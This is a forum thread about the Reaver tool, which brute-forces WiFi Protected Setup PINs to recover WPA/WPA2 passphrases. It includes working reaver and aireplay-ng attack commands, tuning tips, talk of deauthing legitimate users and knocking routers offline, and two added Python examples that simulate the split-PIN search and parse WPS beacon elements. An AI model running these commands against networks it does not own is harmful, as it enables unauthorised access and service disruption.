
Reaver Brute Force Attack Tool Cracking:


Infiltrator


The WiFi Protected Setup protocol is vulnerable to a brute force attack that allows an attacker to recover an access point’s WPS pin, and subsequently the WPA/WPA2 passphrase, in just a matter of hours.

Reaver is a WPA attack tool developed by Tactical Network Solutions that exploits a protocol design flaw in WiFi Protected Setup (WPS). This vulnerability exposes a side-channel attack against Wi-Fi Protected Access (WPA) versions 1 and 2 allowing the extraction of the Pre-Shared Key (PSK) used to secure the network. With a well-chosen PSK, the WPA and WPA2 security protocols are assumed to be secure by a majority of the 802.11 security community.

Usage is simple: just specify the target BSSID and the monitor mode interface to use:

# reaver -i mon0 -b 00:01:02:03:04:05

Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations. On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

WPS allows users to enter an 8 digit PIN to connect to a secured network without having to enter a passphrase. When a user supplies the correct PIN the access point essentially gives the user the WPA/WPA2 PSK that is needed to connect to the network. Reaver will determine an access point's PIN and then extract the PSK and give it to the attacker.

Web source: http://thehackernews.com/2011/12/reaver-brute-force-attack-tool-cracking.html

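The reason the PIN falls in hours rather than years is the two-stage check the article above alludes to: the AP answers the first half of the PIN and the second half separately, and the last digit is a checksum. The following is an added example written for this page, not Reaver's source and not part of the original post or the news article. It stands in for the AP side of the WPS exchange with a Python object (the M4/M6 yes-or-no replies are the assumed model of the protocol flaw; no wireless interface is touched), reuses the PIN 98060122 that shows up later in this thread's Reaver output, and counts how many round trips the attacker needs. The PSK string is made up.

```python
"""
Split-half WPS PIN brute force, simulated end to end.

Added example for this page: NOT Reaver's source and NOT code from the post.
The access point is a Python stand-in for the WPS registrar exchange; nothing
touches a wireless interface.  Assumed model of the protocol design flaw:
  * M4 -> the AP answers M5 if PIN digits 1-4 matched, else EAP-NACK;
  * M6 -> the AP answers M7 (which carries the WPA/WPA2 PSK) if digits 5-8
    matched, else EAP-NACK;
  * digit 8 is a checksum of digits 1-7, so only 3 of the last 4 are unknown.
"""
from typing import Optional, Tuple


def wps_checksum(first_seven: int) -> int:
    """Checksum digit for a 7-digit PIN body: weights 3,1,3,1,3,1,3 from the
    most significant digit; the result makes the weighted sum a multiple of 10."""
    acc = 0
    n = first_seven
    while n:
        acc += 3 * (n % 10)
        n //= 10
        acc += n % 10
        n //= 10
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True when PIN is 8 digits and its last digit is the WPS checksum."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class SimulatedRegistrar:
    """Stand-in for an AP running WPS with a fixed PIN (constructed for this example).

    It counts the M4 and M6 round trips it answered so the cost of the attack
    can be measured exactly.
    """

    def __init__(self, pin: str, psk: str):
        if not is_valid_pin(pin):
            raise ValueError("PIN fails the WPS checksum")
        self._pin = pin
        self._psk = psk
        self.m4_count = 0
        self.m6_count = 0

    def m4(self, first_half: str) -> bool:
        """Registrar sends M4; AP replies M5 (True) or EAP-NACK (False).
        This reply alone leaks whether digits 1-4 were right."""
        self.m4_count += 1
        return first_half == self._pin[:4]

    def m6(self, second_half: str) -> Optional[str]:
        """Registrar sends M6; AP replies M7 with the PSK, or EAP-NACK (None)."""
        self.m6_count += 1
        return self._psk if second_half == self._pin[4:] else None


def recover_pin_and_psk(ap: SimulatedRegistrar) -> Optional[Tuple[str, str]]:
    """Attack the halves independently: at most 10**4 + 10**3 = 11,000 tries,
    instead of 10**7 for a flat search over the 7 free digits."""
    first = None
    for i in range(10_000):
        cand = f"{i:04d}"
        if ap.m4(cand):
            first = cand
            break
    if first is None:
        return None
    for j in range(1_000):
        body = first + f"{j:03d}"
        second = f"{j:03d}{wps_checksum(int(body))}"  # only valid checksums are sent
        psk = ap.m6(second)
        if psk is not None:
            return first + second, psk
    return None


def worst_case_attempts() -> int:
    """Upper bound on M4+M6 exchanges for the split attack."""
    return 10**4 + 10**3


def flat_search_attempts() -> int:
    """Upper bound if the AP only answered after all 8 digits (checksum known)."""
    return 10**7


if __name__ == "__main__":
    # 98060122 is a PIN seen in this thread's Reaver output; the PSK is made up.
    ap = SimulatedRegistrar("98060122", "constructed-passphrase")
    print(recover_pin_and_psk(ap), "after", ap.m4_count, "M4 and", ap.m6_count, "M6 exchanges")
```

Run against that PIN the attacker gets the PSK after 9,807 M4 and 13 M6 exchanges, under the 11,000 bound; on average the first half falls after about 5,000 tries, which is where the article's "half this time" figure comes from. What the simulation leaves out is exactly what the rest of this thread is about: the per-attempt delay, receive timeouts, and APs that lock up or lock out WPS after repeated failures.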


Anyone else trying this out and want to bounce some ideas around? I've been trying to successfully crack my test WAP here in my basement, to no avail. Either reaver just stops working after some random point, for example:

[!] WARNING: Receive timeout occurred
[+] 21.40% complete @ 12 seconds/attempt
[+] Trying pin 98060122
[!] WARNING: Receive timeout occurred
[+] Trying pin 98060122

...and then it will just hang there for hours/days/weeks if I let it. OR it will bomb out repeating

[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred

...over and over again. I've messed with the -t and -d operators, but nothing conclusive. Putting -t to 3 or 4 seems to really expand the lifespan of the attack, and -d 0 seems to speed things up quite a bit, but they always end up failing before it reaches 100%. Any ideas would be greatly appreciated, as any documentation or anything at all really regarding this tool, is pretty sparse. Thanks for starting this thread Infiltrator - the tool really is pretty sweet...especially if I could get it working!

PS: I'm rocking BT5R1 with the latest reaver beta 1.3 on an alfa realtek8180.

telot


Roughly, how long did it take you to get to 21%?

It happened sometime in the middle of the night last night. I started around 5pm, so roughly 4 to 12 hours. That was with a 10 second delay (-d 10).

Thanks in advance if you have any insight Vodmya!

telot



When this happened to me it was DoS-ing my router and put my router in a boot loop till I stopped it. This attack has been known to DoS some routers.


telot, you are using an unsupported driver; see here for a compatible driver.


Have you guys configured your AP to work with WPS? If it's only using the normal security (WPA2 Personal + AES or PSK) it's not going to work. It needs to be configured with WPS; if not, Reaver is not going to be effective.


According to the Reaver creator, it should not take more than 10 hours to recover the password; if it's taking way longer then there must be something wrong.


I'm using the rtl8187 driver for the alfa usb 036H. The router I'm using is a crappy old WNDR2000 with WPS enabled. I'm thinking it's some option in my command.

sudo ./reaver -i mon0 -b XX:XX:XX:XX:XX -t 3 -d 10 -vv

Anything in that command stand out as totally wrong? I've modified the -t to 4 and 5, and changed the -d from 0 to 15.

And about the DoS'ing the router - I'm pretty sure that is what is happening. The router does NOT function as normal until I reset it (sometimes it requires pushing in the Full Restore hard reset button). Is this avoidable through the above operators (-d and -t)? I read somewhere (frantically searching for link, but cannot find it) that reaver can break crappier (slow, old, cheap) routers, but more robust routers handle the PIN trials just fine. Have any of you got it work on certain routers but not others?

I agree with Bobbyb - this could be the exploit of the year/decade if it works out, particularly for us wifi scoundrels. Thanks for your comments thus far, and for any further insight you can share.

telot


This is a step in the right direction but will most likely fail against cheap/older routers that will just crap themselves and lock up, requiring a hard reset. Also remember not everyone will enable or press the WPS button on their routers. If I get time this weekend I will try it on a mid-range Netgear 3500.


A few things here. I haven't had much time to test, but this can all be found online:

1) reaver has a feature to stop an attack and continue later (apparently you need to save the session somehow, though it might save itself?)

2) from arstechnica's review on it "The attack took about six hours to properly guess the PIN and return the SSID and password for the target network. During that time, the router locked up once under load, as I was putting normal levels of network traffic through it from other devices. Some routers will also lock out WPS requests for five minutes or so when they detect multiple failed PIN submissions—mine stopped responding occasionally, generating a string of warnings, but Reaver picked back up where it left off once the Linksys started responding again."

3) There is a new version (1.3) which apparently is a little faster (saves a few minutes? lol), but it also includes a program called walsh to scan and detect devices which are exploitable. I can't get walsh to find anything on my system... =(

I'll have more time to play with it later but I'm sure there are still lots of bugs being worked out.

Also, there is another script which is apparently faster than reaver... (once again, haven't tried it yet...)

good luck and hopefully in the coming days we can figure out things a bit more!

By the way, this is my first post and I love hak5 =)


1. That session resume feature is included only in the commercial version. I just read (but haven't confirmed) that the source for the commercial version is now available as well. I'll give it a shot asap.

2. So ars reset the router when needed? I guess if your attack wasn't working and there were other (legitimate) users on the access point, you could deauth them off with aireplay -0, though I'm not sure how the deauth would affect reaver. If a legit user was deauth'd for long enough, eventually the AP would get reset. Not sure how many times that will work though, and it vastly increases the risk. So no reaver'ing after hours if that's the case.

3. 1.3 beta is what I have at the moment. I'll check to see if there's any update when I get home (mobile right now). Fingers crossed!

I agree, they are definitely working out the bugs, as reaver is hot off the presses. It's exciting to be using cutting edge tools though, gotta say.

telot


Yes, this is only for WPS Pins. I had a vulnerable Buffalo running DD-WRT. After disabling all WPS related options (also called AOSS on Buffalo), the only way in was the 256bit WPA2 key.

Note: I did not run the tool, just changed the settings so that WPS wasn't an option that was offered when connecting.

PD


The newest version (not in the download section; download the svn) is v1.4 (type "svn checkout http://reaver-wps.googlecode.com/svn/trunk/"), then configure/make/make install it. You need make install as it creates a folder and stuff for the sessions.

This version I can confirm saves sessions and restores them. It's all automatic: start reaver again and it asks if you want to continue.

also, before this svn, reaver and walsh didn't work for me. now it appears to be working... will let you know in 10 hr... unless my computer/the router crashes before then lol


I have used Wash to see how many APs are vulnerable. Most of my nearby APs at home and at work are Apple Airport Extremes and they seem to be safe... But there is a lot of vulnerable wifi out there. Tried reaver at two of my friends' houses and both of them took about 7-8 hours to retrieve the key. They will now disable WPS. ;)

Version 1.4 via svn is to be preferred though. Had a bunch of strange errors before I went to the beta version...


This is really fascinating. I didn't know this post would get this so many replies.


Finally tried 1.3 over the weekend and didn't have much success. Too many receiving timeouts etc and patience wasn't my virtue. This ver did support resume. Couldn't get Wash to run properly (can get the WPS info out of the packets anyway using wireshark). Just installed 1.4. (110) of Reaver. Wash is running perfect and am just tweaking the timing and delays to find the sweet spot with my AP. Looks very promising. Impressed I am :-)


Maybe because your topic mentioned WPA in 10 minutes... that gets everybody's attention :D

Have to admit this is a scary flaw indeed. I have been doing some checking and there are a LOT of vulnerable routers as far as Walsh / Wash is showing..

When this tool first came out I thought I wouldn't be in trouble as my router did not have WPS configured.. but oohhh yes I was !!

http://adaywithtape.blogspot.com/2012/01/cracking-wpa-using-wps-vulnerability.html

By the way, I am having trouble with v1.4. Wash works great, however when running reaver it seems to have problems associating..

Is there any limitation on that read-only download?

v1.3 works fine, so I am a little confused...


Been testing with 1.4 and am having a much better go with it. Timeouts/locks (varies by vendor) still occur but the resume feature makes up for potential lost time. Once it finds the 1st four digits it's generally pretty quick after that. Some of the older routers are still using default pins and they take about 5 secs to crack. Even though I knew it was only a matter of time I was still kinda dumbstruck when the app spit my password out at me since I never expected to see it done so easily (even with various mutations this was a password that was not supposed to be presented in this manner ;-). This has been a valuable "hands on" week with Wireshark as well. Looking for a filter for WPS? try wlan_mgt.wfa.ie.type == 0x04

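Wash (walsh) decides which APs are worth a look by reading the WPS information element out of beacons and probe responses, which is the same thing the Wireshark filter quoted above matches: a vendor-specific element carrying the Wi-Fi Alliance OUI 00:50:F2 with OUI type 0x04. The parser below is an added example, not wash's or Reaver's code and not from any post in this thread. It pulls out the fields wash reports (WPS version, configured state, and whether the AP advertises "AP Setup Locked", the flag behind the lock-outs people describe in this thread). The tag blobs it parses are constructed by hand for the example; only the SSID FUBAR is taken from the thread, and the manufacturer and model strings are invented placeholders.

```python
"""
Parse the WPS information element from an 802.11 beacon / probe-response tag blob.

Added example for this page: NOT wash/walsh or Reaver code and NOT from any post
in this thread.  The sample frames at the bottom are constructed by hand; only the
SSID "FUBAR" comes from the thread, manufacturer/model strings are placeholders.
"""
import struct
from typing import Dict, Iterator, Tuple

WFA_OUI = b"\x00\x50\xf2"   # Wi-Fi Alliance OUI used by the WPS vendor-specific IE
WPS_OUI_TYPE = 0x04         # OUI type 4 = WPS (other types exist under this OUI, e.g. 2 = WMM)

# WPS attribute TLVs: big-endian 16-bit type, 16-bit length, value
ATTR_VERSION = 0x104A          # one byte, 0x10 means version 1.0
ATTR_WPS_STATE = 0x1044        # 0x01 = Not Configured, 0x02 = Configured
ATTR_AP_SETUP_LOCKED = 0x1057  # 0x01 = AP is refusing external-registrar PIN attempts
ATTR_MANUFACTURER = 0x1021
ATTR_MODEL_NAME = 0x1023


def ie(eid: int, value: bytes) -> bytes:
    """Encode one 802.11 information element (id, length, value)."""
    return bytes([eid, len(value)]) + value


def wps_attr(atype: int, value: bytes) -> bytes:
    """Encode one WPS attribute TLV."""
    return struct.pack(">HH", atype, len(value)) + value


def parse_ies(tagged: bytes) -> Iterator[Tuple[int, bytes]]:
    """Walk the tagged-parameter area; stop cleanly on a truncated element."""
    off = 0
    while off + 2 <= len(tagged):
        eid, ln = tagged[off], tagged[off + 1]
        value = tagged[off + 2: off + 2 + ln]
        if len(value) < ln:
            break
        yield eid, value
        off += 2 + ln


def parse_wps_attrs(body: bytes) -> Dict[int, bytes]:
    """Decode the TLVs that follow the OUI/type header of a WPS IE."""
    attrs: Dict[int, bytes] = {}
    off = 0
    while off + 4 <= len(body):
        atype, alen = struct.unpack_from(">HH", body, off)
        value = body[off + 4: off + 4 + alen]
        if len(value) < alen:
            break
        attrs[atype] = value
        off += 4 + alen
    return attrs


def wps_summary(tagged: bytes) -> dict:
    """Return the per-AP fields a scanner such as wash would print."""
    s = {"ssid": None, "wps": False, "version": None, "state": None,
         "locked": False, "manufacturer": None, "model": None}
    for eid, value in parse_ies(tagged):
        if eid == 0x00 and s["ssid"] is None:
            s["ssid"] = value.decode("utf-8", "replace")
        elif eid == 0xDD and value[:4] == WFA_OUI + bytes([WPS_OUI_TYPE]):
            s["wps"] = True
            attrs = parse_wps_attrs(value[4:])
            ver = attrs.get(ATTR_VERSION)
            if ver and len(ver) == 1:
                s["version"] = f"{ver[0] >> 4}.{ver[0] & 0x0F}"
            s["state"] = {b"\x01": "Not Configured", b"\x02": "Configured"}.get(
                attrs.get(ATTR_WPS_STATE), "Unknown")
            s["locked"] = attrs.get(ATTR_AP_SETUP_LOCKED) == b"\x01"
            if ATTR_MANUFACTURER in attrs:
                s["manufacturer"] = attrs[ATTR_MANUFACTURER].decode("utf-8", "replace")
            if ATTR_MODEL_NAME in attrs:
                s["model"] = attrs[ATTR_MODEL_NAME].decode("utf-8", "replace")
    return s


def worth_trying(summary: dict) -> bool:
    """wash's rule of thumb: WPS advertised and the AP not reporting Setup Locked."""
    return bool(summary["wps"]) and not summary["locked"]


# Constructed sample tag blobs (not captures).
LOCKED_AP = (
    ie(0x00, b"FUBAR")
    + ie(0x01, b"\x82\x84\x8b\x96")                        # supported rates
    + ie(0xDD, WFA_OUI + bytes([WPS_OUI_TYPE])
         + wps_attr(ATTR_VERSION, b"\x10")
         + wps_attr(ATTR_WPS_STATE, b"\x02")
         + wps_attr(ATTR_AP_SETUP_LOCKED, b"\x01")
         + wps_attr(ATTR_MANUFACTURER, b"ExampleCo")       # placeholder
         + wps_attr(ATTR_MODEL_NAME, b"TestAP"))           # placeholder
)
OPEN_WPS_AP = (
    ie(0x00, b"lab-ap")
    + ie(0xDD, WFA_OUI + bytes([WPS_OUI_TYPE])
         + wps_attr(ATTR_VERSION, b"\x10")
         + wps_attr(ATTR_WPS_STATE, b"\x02"))
)
NO_WPS_AP = ie(0x00, b"no-wps") + ie(0xDD, WFA_OUI + b"\x02\x01\x01\x00")  # WMM IE: same OUI, type 2
TRUNCATED_AP = LOCKED_AP[:-6]   # capture cut off inside the WPS IE

if __name__ == "__main__":
    for blob in (LOCKED_AP, OPEN_WPS_AP, NO_WPS_AP, TRUNCATED_AP):
        print(wps_summary(blob))
```

The WMM element is included on purpose: it shares the 00:50:F2 OUI, so a scanner that keys on the OUI alone and ignores the type byte will list APs that do not run WPS at all. The truncated blob shows the other failure mode: a cut-off capture yields the SSID but no WPS verdict, rather than a mis-parsed one.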

Thanks very much for posting your research Vodmya. You motivated me to pick it up again (especially now that resume is working well! woo!). Did you happen to record which settings (I imagine -d and -t?) worked for which router models? Thanks again man

telot


I just wanted to revert on the issues I have/had been experiencing with reaver v1.4.

As previously mentioned, reaver v1.3 was/is working fine on my test setup, however v1.4 failed to associate each and every time, no matter what I tried.

I managed to bypass that issue by associating to the AP with aireplay-ng and then using the -A switch when running reaver v1.4.

So first run the aireplay-ng fake auth against the router:

aireplay-ng -1 120 -a 98:FC:11:8E:0E:9C -e FUBAR mon0

then run reaver with the -A switch:

reaver -i mon0 -A -b 98:FC:11:8E:0E:9C -v

That resulted in much better results!

Updated blog post:

http://adaywithtape.blogspot.com/2012/01/cracking-wpa-using-wps-vulnerability.html
